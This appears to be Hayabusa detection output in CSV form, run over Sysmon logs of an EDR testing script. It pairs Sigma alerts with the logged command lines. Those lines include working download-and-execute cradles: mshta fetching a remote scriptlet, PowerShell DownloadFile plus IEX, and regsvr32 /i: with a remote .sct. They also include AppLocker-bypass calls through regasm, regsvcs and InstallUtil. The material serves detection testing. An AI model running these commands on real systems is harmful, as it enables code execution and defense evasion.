Log,,rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5116 | PGUID: 
747F3D96-6619-5D3F-0000-0010FDE78600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-6619-5D3F-0000-0010BEE98600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 776 | PGUID: 747F3D96-661E-5D3F-0000-0010A3148700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6756 | PGUID: 
747F3D96-661E-5D3F-0000-00103F168700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas,Mshta JavaScript Execution,,rules/sigma/process_creation/proc_creation_win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 404 | PGUID: 747F3D96-6620-5D3F-0000-0010C7798700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49826 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49827 (MSEDGEWIN10.home) | Dst: 93.184.220.29:80 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1356 | PGUID: 747F3D96-6621-5D3F-0000-001071D28700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5816 | PGUID: 747F3D96-6623-5D3F-0000-001011F68700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6156 | PGUID: 747F3D96-6623-5D3F-0000-0010CBF78700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:24.104 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 1176 | PGUID: 747F3D96-6624-5D3F-0000-0010E8358800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49828 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1296 | PGUID: 747F3D96-6628-5D3F-0000-001067768800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2040 | PGUID: 747F3D96-6628-5D3F-0000-001062788800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | LID: 0x413182 | PID: 4860 | PGUID: 747F3D96-6628-5D3F-0000-00105B918800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5708 | PGUID: 747F3D96-6628-5D3F-0000-0010B1968800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6552 | PGUID: 747F3D96-6628-5D3F-0000-0010349B8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4564 | PGUID: 747F3D96-6629-5D3F-0000-0010C0BE8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-662E-5D3F-0000-001011038900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1976 | PGUID: 747F3D96-662E-5D3F-0000-0010C2048900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2604 | PGUID: 747F3D96-662E-5D3F-0000-001054068900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4092 | PGUID: 747F3D96-6633-5D3F-0000-001051608900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6633-5D3F-0000-001092628900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6633-5D3F-0000-0010F0638900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | LID: 0x413182 | PID: 3512 | PGUID: 747F3D96-6633-5D3F-0000-0010D9778900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1652 | PGUID: 747F3D96-6638-5D3F-0000-00103DA88900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4632 | PGUID: 747F3D96-6638-5D3F-0000-001022AA8900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 208 | PGUID: 747F3D96-6639-5D3F-0000-001074F48900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49829 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
